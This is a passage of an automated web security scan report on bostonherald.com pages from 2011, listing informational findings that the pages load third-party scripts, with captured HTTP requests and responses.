Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:40:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 68225

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.689. http://www.bostonherald.com/news/regional/view.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/regional/view.bg

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

Response

18.690. http://www.bostonherald.com/news/regional/view/20110108owner_hopes_pet_snakes_its_way_to_safety/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/regional/view/20110108owner_hopes_pet_snakes_its_way_to_safety/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /news/regional/view/20110108owner_hopes_pet_snakes_its_way_to_safety/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:37:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 43042

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.691. http://www.bostonherald.com/news/regional/view/20110128another_winter_wallop_batters_boston/format=comments&srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/regional/view/20110128another_winter_wallop_batters_boston/format=comments&srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:35:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 95964

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.692. http://www.bostonherald.com/news/regional/view/20110128another_winter_wallop_batters_boston/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/regional/view/20110128another_winter_wallop_batters_boston/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /news/regional/view/20110128another_winter_wallop_batters_boston/srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:35:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 47814

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.693. http://www.bostonherald.com/news/regional/view/20110128cops_boozy_cabbie_hails_rescue_me/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/regional/view/20110128cops_boozy_cabbie_hails_rescue_me/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /news/regional/view/20110128cops_boozy_cabbie_hails_rescue_me/srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:36:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 43537

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.694. http://www.bostonherald.com/news/regional/view/20110128crane_elevator_malfunction_keeps_worker_hanging/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/regional/view/20110128crane_elevator_malfunction_keeps_worker_hanging/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /news/regional/view/20110128crane_elevator_malfunction_keeps_worker_hanging/srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:36:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 42107

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.695. http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/format=comments&srvc=home&position=4 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/format=comments&srvc=home&position=4

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:35:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 95413

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.696. http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc=home&position=4 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc=home&position=4

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc=home&position=4 HTTP/1.1
Host: www.bostonherald.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
